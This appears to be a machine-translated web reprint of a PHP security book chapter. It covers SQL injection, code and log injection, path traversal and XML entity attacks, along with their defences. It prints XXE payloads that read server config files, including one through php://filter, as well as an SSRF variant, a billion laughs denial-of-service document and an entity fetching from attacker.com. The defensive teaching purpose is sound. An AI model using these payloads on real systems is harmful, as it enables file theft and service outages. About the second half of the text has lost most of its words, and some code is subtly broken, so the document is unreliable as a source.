The book "Security in PHP" (part 1)
In the list of the ten most common types of attacks according to OWASP, the first two places are occupied by attacks with code injection and XSS (cross-site scripting). They go hand in hand, because XSS, like a number of other types of attacks, depends on the success of attacks with the introduction. This name hides a whole class of attacks, during which data is embedded in a web application in order to force it to execute or interpret malicious code in the way the attacker needs. Such attacks include, for example, XSS, SQL injection, header injection, code injection, and Full Path Disclosure. And this is only a small part.
Implementation attacks are a horror story for all programmers. They are the most common and successful due to the diversity, scale and (sometimes) the complexity of protection against them. All applications need to take data from somewhere. XSS and UI Redress are especially common, so I dedicated separate chapters to them and separated them from the general class.
OWASP offers the following definition of injection attacks:
Deployment capabilities — such as SQL, OS, and LDAP — occur when the interpreter receives unreliable data as part of a command query. Malicious data can fool the interpreter and force it to execute certain commands or access unauthorized data.
The introduction of SQL - the most common and extremely dangerous form of attacks with the introduction. It is difficult to overestimate the seriousness of this threat, so it is extremely important to understand what influences the success of attacks and how to protect against them.
So, the data is embedded in a web application, and then used in SQL queries. Usually they come from unreliable input sources, such as web forms. However, the deployment can be done from other places, say, from the database itself. Programmers often believe in the complete security of their base, not realizing that if it was safe in one case, this does not at all mean that it will be safe in the future. The data from the database should be considered unreliable until proven otherwise, that is, until they have passed the test.
If the attack is successful, the attacker can manipulate the SQL query so that it performs operations with the database that are not provided for by the developers.
Look at this request:
$db = new mysqli('localhost', 'username', 'password', 'storedb'); $result = $db->query( 'SELECT * FROM transactions WHERE user_id = ' . $_POST['user_id'] );
There are a number of stocks. First, we did not check the contents of the POST data for user_id
. Secondly, we allow an unreliable source to tell us which user_id
use: an attacker can slip any valid user_id
. It may have been contained in a hidden form field, which we considered safe because it cannot be edited (while forgetting that attackers can enter any data). Thirdly, we did not screen user_id
and did not pass it to the request as a parameter (bound parameter), which also allows the attacker to inject arbitrary rows that will manipulate the SQL query, given that we could not verify it first.
These three omissions are very common in web applications.
Regarding database trust, imagine that we searched for transactions using the user_name
field. Names have a wide scope and may contain quotes. Suppose the attacker retains the embedded string value in one of the user names. When we again use this value in one of the following queries, it will manipulate the query string, since we have considered the database as a reliable source, have not isolated or limited the compromised query.
Also pay attention to another factor in SQL injection: it is not always necessary to keep persistent storage on the server. HTML 5 supports client-side database usage, where you can send queries using SQL and JavaScript. There are two APIs for this: WebSQL and IndexedDB. In 2010, the W3C did not recommend choosing WebSQL; It is supported by WebKit browsers that use SQLite as a backend. Most likely, support will remain for the sake of backward compatibility, even despite the recommendation of the W3C. As its name implies, this API accepts SQL queries, which means it can be the target of injection attacks. IndexedDB is a newer alternative, the NoSQL database (does not require the use of SQL queries).
Manipulating SQL queries can have the following goals:
Protection against SQL injection is based on the principle of separation. Before using the data in the request, it is necessary to check that their form is correct. It is also necessary to isolate the data prior to inclusion in the request or include it as a transition parameter.
I do not get tired of repeating: all data that was not explicitly created in the source PHP code of the current request is unreliable. Strictly check them and reject everything that did not pass checks. Do not try to "fix" the data, you can make only light, cosmetic changes to the format.
Frequent errors include checking data for further current use (for example, for display on the screen or for calculations) and the lack of verification of database fields in which information will be saved as a result.
With the mysqli
extension you can isolate all the data included in the SQL query. This is done by the mysqli_real_escape_string()
function. The pgsql
extension for PostgresSQL offers the functions pg_escape_bytea()
, pg_escape_identifier()
, pg_escape_literal()
and pg_escape_string()
. In the mssql (Microsoft SQL Server)
extension mssql (Microsoft SQL Server)
there are no isolating functions, and the approach using addslashes()
inefficient - you will need a custom function .
To further complicate your life, I will say that you have no right to mistake when isolating the data entered in the request. One slip - and you are vulnerable to attack.
Summarize. Shielding is not the best defense. To him it is necessary to resort as a last resort. It may be necessary if the database library you are using for abstraction allows you to configure bare SQL queries or parts of a query without forcibly binding parameters. In other cases, it is better to avoid isolation at all. This approach is complex, provokes errors and differs depending on the database extension.
Parameterization, or parameter binding, is the recommended way to create SQL queries. All good database libraries use it by default. Here is an example of using the PDO extension for PHP:
if(ctype_digit($_POST['id']) && is_int($_POST['id'])) { $validatedId = $_POST['id']; $pdo = new PDO('mysql:store.db'); $stmt = $pdo->prepare('SELECT * FROM transactions WHERE user_id = :id'); $stmt->bindParam(':id', $validatedId, PDO::PARAM_INT); $stmt->execute(); } else { // id }
The bindParam()
method, available for PDO expressions, allows you to bind parameters to “placeholders” (placeholders) represented in a previously prepared expression. This method accepts the parameters of the main data types, for example, PDO::PARAM_INT
, PDO::PARAM_BOOL
, PDO::PARAM_LOB
and PDO::PARAM_STR
. For PDO::PARAM_STR
this is done by default unless otherwise specified, so remember for other values!
Unlike manual isolation, parameter binding (or another method used by your database library) will allow you to isolate data that is automatically linked, so you don’t have to remember which function to use. Also, coordinated parameter binding is much more reliable than trying not to forget that you need to isolate everything manually.
Interrupting a successful SQL injection is as important as preventing it completely. When an attacker gets the ability to execute SQL queries, he will do it as a specific database user. Thanks to the principle of least privilege, you can make sure that all users have only those privileges that are absolutely necessary to perform their tasks.
If a user has wide privileges, then an attacker can delete tables and change the privileges of other users, performing new SQL implementations on their behalf. To prevent this from happening, never access the database from a web application as root, administrator, or another user with high privileges.
Another application of the principle is the separation of the roles of reading and writing data to the database. Select one user with write access only and another user with read only access. If the attack is directed at the “reading” user, then the attacker will not be able to manipulate the data in the table or write it down. You can restrict access in even narrower frames, thereby reducing the effects of successful SQL injection attacks.
Many web applications, especially open source, are designed so that they use only one database user, whose privileges are almost certainly never checked. So do not forget about this moment and do not try to run applications under the administrator account.
Code injection is any way that allows an attacker to add source code to a web application with the ability to interpret and execute it. In this case we are not talking about the implementation of code in the client part, for example in JavaScript, here XSS-attacks are already used.
You can embed source code directly from an unreliable source of input data, or you can force a web application to load it from a local file system or an external resource like a URL. When code is introduced as a result of the inclusion of an external source, it is usually called remote file inclusion (RFI), although RFI itself is always intended to embed the code.
The main reasons for the introduction of code:
Pay special attention to the last point: in this case, unreliable users can upload any files to the server.
In PHP, there are many goals for code injection, so this type of attack heads the watch list for any programmer.
The most obvious targets for code injection are the include()
, include_once()
, require()
and require_once()
functions. If the unreliable input data allows you to determine the path
parameter passed to these functions, you can remotely control the choice of file to include. It should be noted that the included file does not have to be a real PHP file, it is allowed to use a file of any format capable of storing textual data (that is, almost without restrictions).
The path
parameter may also be vulnerable to directory traversal attacks or remote file inclusion. Using combinations of ../ or ... characters in a path
allows an attacker to navigate to almost any file that the PHP process has access to. At the same time, in the default PHP configuration, the above functions take a URL, unless allow_url_include is disabled.
The PHP eval()
function accepts a string of PHP code for execution.
The PCRE function (Perl-compatible regular expression) preg_replace()
in PHP allows the use of the e modifier (PREG_REPLACE_EVAL). This means a replacement string, which after substitution will be considered PHP code. And if there is unreliable input data in this line, they will be able to inject the executable PHP code.
Web applications, by definition, include the files needed to service any requests. If we take advantage of defects in the logic of routing, dependency management, autoload, and other processes, then manipulating the path through the query or its parameters will cause the server to include specific local files. Since the web application is not designed to handle such manipulations, the consequences can be unpredictable. For example, an application will unwittingly light up routes intended only for use on the command line. Or reveal other classes, the designers of which perform tasks (it is better not to design classes like this, but it still occurs). Any of these scenarios can interfere with the backend operations of the application, which allows you to manipulate data or conduct a DOS attack on resource-intensive operations that do not imply direct access.
The range of tasks is extremely wide, since this type of attack allows you to execute any PHP code to choose an attacker.
Many applications collect logs, and authorized users often view them through the HTML interface. Therefore, logs are one of the main targets of intruders who want to disguise other attacks, deceive those who view the logs, and even conduct an attack on the users of the monitoring application, through which the logs are read and analyzed.
The vulnerability of the logs depends on the mechanisms controlling the recording of logs, as well as on the handling of log data as an unreliable source when viewing and analyzing records.
A simple journaling system can write text lines to a file_put_contents()
using file_put_contents()
. For example, a programmer registers erroneous authorization attempts in the form of strings of the following format:
sprintf("Failed login attempt by %s", $username);
But what if the attacker uses the name “AdminnSuccessful login by Adminn” in the form?
If this line is inserted into the log from unreliable input data, then the attacker will successfully mask an unsuccessful authorization attempt with an innocent failure to enter the admin password. The suspicion of data will decrease even more if you add a successful authorization attempt.
Here the whole point is that the attacker is able to add various entries to the log. You can also embed XSS-vector and even characters that make it difficult to read log entries in the console.
One of the goals of implementation is the interpreter of the log format. If the analysis tool uses regular expressions for parsing records in the log to divide them into parts and spread them across different fields, then you can create and implement such a string that will force regular expressions to choose embedded fields instead of correct ones. For example, this entry can cause several problems:
$username = "iamnothacker! at Mon Jan 01 00:00:00 +1000 2009"; sprintf("Failed login attempt by %s at %s", $username, )
More sophisticated log injection attacks are based on directory traversal attacks to display logs in the browser. Under suitable conditions, inserting a PHP code into a log message and opening a file with records in the browser will lead to successful code injection, neatly formatted and executed at the request of the attacker. And if it comes to executing malicious PHP on the server, all that remains is to rely only on the effectiveness of defense separation, which can reduce the damage.
The easiest way is to filter all external log messages using the white list. Suppose you limit the character set to only numbers, letters, and spaces. Messages containing unresolved characters are considered damaged. Then a record appears in the log about a potential attempt to embed the log file. This is an easy way to protect simple text logs, when you cannot avoid including unreliable input data in messages.
The second method of protection is the conversion of portions of unreliable input data using a system like base64 , which supports a limited set of characters, while allowing you to store a variety of information in text form.
Path bypass attacks are attempts to influence the read or write operation of files in the backend of a web application. This is done through the implementation of parameters that allow you to manipulate the paths of files involved in backend operations. So attacks of this type facilitate information disclosure and local / remote file injection.
We will consider such attacks separately, but the basis of their success is precisely the detour of the path. Since the functions described below are typical for manipulating file paths, it makes sense to mention that many PHP functions do not accept paths to files in the usual sense of the word. Instead, functions like include()
or file()
take a URI.
It looks completely unnatural. But this means the equivalence of the two following function calls that use absolute paths (for example, without relying on autoloading relative paths).
include('/var/www/vendor/library/Class.php'); include('file:///var/www/vendor/library/Class.php');
The fact is that the relative path is processed on the side (setting include_path
in php.ini and available autoloaders). In such cases, PHP functions are especially vulnerable to many forms of parameter manipulation, including substitution of a file URI scheme (File URI Scheme Substitution), where an attacker can embed an HTTP or FTP URI if unreliable data is inserted at the beginning of the file path. We'll talk more about this in the section on attacks with remote file inclusion, but for now let's focus on traversing file system paths.
This vulnerability involves changing the path to access another file. This is usually achieved by embedding a series of sequences ../ into an argument that is then attached to functions or inserted entirely into functions like include()
, require()
, file_get_contents()
and even less suspicious (for someone) functions like DOMDocument::load()
.
Using the sequence ../, the attacker forces the system to return to the parent directory. So the path /var/www/public/../vendor
actually leads to /var/www/vendor
. The sequence ../ after / public
returns us to the parent directory, i.e., to / var/www
. In this way, the attacker gains access to files located outside the / public
directory accessible from the web server.
Of course, bypassing the path is not limited to just one return. You can embed new path elements to get access to child directories that are not accessible from the browser due to the restriction settings in .htaccess. PHP file system operations do not care about the configuration of access control to non-public files and directories on the web server.
Despite the introduction of JSON as a lightweight data transfer between server and client, XML remains a popular alternative, the web services API often supports it in parallel with JSON. Also, XML is used to exchange data using XML schemas: RSS, Atom, SOAP and RDF, etc.
XML is omnipresent: it can be found in web application servers, in browsers (as the preferred format for requests and responses of XMLHttpRequest) and browser extensions. Considering its prevalence and default processing by such a popular parser like libxml2, used by PHP in the DOM and in the extensions SimpleXML and XMLReader, XML has become the target for injection attacks. When the browser is actively involved in the XML exchange, it is necessary to take into account that through XSS, authorized users can transmit XML requests that are actually created by attackers.
Such attacks are due to the fact that XML parsing libraries often support the use of links to custom entities. You'll be introduced to the standard XML entity addition, used to represent special markup characters like >
, <
; and &apos
;. XML allows you to extend the set of standard entities by defining custom entities through the XML document itself. They can be defined directly including in the optional DOCTYPE. The extended value they represent can refer to an external resource that must be included. XXE- XML , . . XXE XXE-, .
, , harmless:
<!DOCTYPE results [ <!ENTITY harmless "completely harmless"> ]>
XML- &harmless; , :
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless "completely harmless">]> <results> <result>This result is &harmless;</result> </results>
XML- PHP DOM XML, , . :
This result is completely harmless
, XML . , XML , . , , XML, . , :
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]> <results> <result>&harmless;</result> </results>
&harmless;
. XML- - . , . XML, , , . . XML, XML, , . PHP , , HTTP- -, .
PHP XML: PHP DOM, SimpleXML XMLReader. libxml2, . , PHP XXE-, - , XML.
, XHTML HTML 5 XML. , XHTML- XML- HTML 5 XML, DOMDocument::loadXML()
DOMDocument::loadHTML()
. XML- XML-. , libxml2 HTML 5 DOCTYPE, XHTML DOCTYPES.
, , XML- .
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY harmless SYSTEM "file:///var/www/config.ini">]> <results> <result>&harmless;</result> </results>
&harmless;
. , , . , , . , : XML-, , XML-. , PHP:
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/config.ini" > ]> <results> <result>&harmless;</result> </results>
PHP URI, , : file_get_contents()
, require()
, require_once()
, file()
, copy()
. PHP , , . , , convert.base-64-encode
.
, PHP , . , . , . , , .
. XXE- -, . . :
if (isset($_SERVER['HTTP_CLIENT_IP']) || isset($_SERVER['HTTP_X_FORWARDED_FOR']) || !in_array(@$_SERVER['REMOTE_ADDR'], array( '127.0.0.1', '::1', )) ) { header('HTTP/1.0 403 Forbidden'); exit( 'You are not allowed to access this file.' ); }
PHP, , PHP- , . . localhost. XXE- , , HTTP- XML- localhost.
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY harmless SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php" > ]> <results> <result>&harmless;</result> </results>
, . , .
DOS- , . XML- HTTP-, .
DOS- XXE- XML-.
, , . DOM, SimpleXML XMLReader libxml2, libxml_disable_entity_loader()
, . , , DOCTYPE, , HTTP- .
$oldValue = libxml_disable_entity_loader(true); $dom = new DOMDocument(); $dom->loadXML($xml); libxml_disable_entity_loader($oldValue);
, XML , URI.
, , . «» XML, , XXE-:
libxml_disable_entity_loader(true);
TRUE . , Docbook XML HTML, XSL- .
libxml2 — . PHP-, - XML, «» .
, , XML- DOCTYPE. , XML-, XML- . , — , . . , .
/** * Attempt a quickie detection */ $collapsedXML = preg_replace("/[:space:]/", '', $xml); if(preg_match("/<!DOCTYPE/i", $collapsedXml)) { throw new \InvalidArgumentException( 'Invalid XML: Detected use of illegal DOCTYPE' ); }
, . -, ? , , (, ). , libxml_disable_entity_loader()
, , . XML- (XML Entity Expansion).
XML-. DOS- . DOCTYPE XML , , , XML- . . XML- HTML 5 , libxml2 HTML.
XML- .
— « ». . , , XML- XML.
<?xml version="1.0"?> <!DOCTYPE results [<!ENTITY long "SOME_SUPER_LONG_STRING">]> <results> <result>Now include &long; lots of times to expand the in-memory size of this XML structure</result> <result>&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; &long;&long;&long;&long;&long;&long;&long;&long; Keep it going... &long;&long;&long;&long;&long;&long;&long;...</result> </results>
, XML- , . , DOS-. : XML , .
XML, . (resolve) , . , XML- (Billion Laughs Attack).
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY x0 "BOOM!"> <!ENTITY x1 "&x0;&x0;"> <!ENTITY x2 "&x1;&x1;"> <!ENTITY x3 "&x2;&x2;"> <!-- Add the remaining sequence from x4...x100 (or boom) --> <!ENTITY x99 "&x98;&x98;"> <!ENTITY boom "&x99;&x99;"> ]> <results> <result>Explode in 3...2...1...&boom;</result> </results>
XML- XML, . , , 2^100 — &x0;
. !
XML DTD. , XML- HTTP-. XXE ( XML-), . , XXE, .
: XML- HTTP- . , , HTTP-. , - , , .
<?xml version="1.0"?> <!DOCTYPE results [ <!ENTITY cascade SYSTEM "http://attacker.com/entity1.xml"> ]> <results> <result>3..2..1...&cascade<result> </results>
DOS- : , . : (resolve) XML- . XXE-, DOS-.
, XXE-. (resolution) XML- , ; HTTP- , XML- PHP, libxml2.
libxml_disable_entity_loader(true);
PHP XML DTD DOCTYPE. PHP LIBXML_NOENT
, DOMDocument::$substituteEntities
, . , .
libxml2 , , . ; - , libxml2 .
, — XML- . , . , — XML, DOCTYPE. , DOCTYPE , . . HTTPS-. , PHP DTD. , libxml_disable_entity_loader(TRUE)
, , , (node value). .
$dom = new DOMDocument; $dom->loadXML($xml); foreach ($dom->childNodes as $child) { if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { throw new \InvalidArgumentException( 'Invalid XML: Detected use of illegal DOCTYPE' ); } }
, libxml_disable_entity_loader
TRUE, (resolve) XML. , XML- libxml2, .
SimpleXML, , simplexml_import_dom()
DOMDocument.
TBD
Source: https://habr.com/ru/post/352440/
All Articles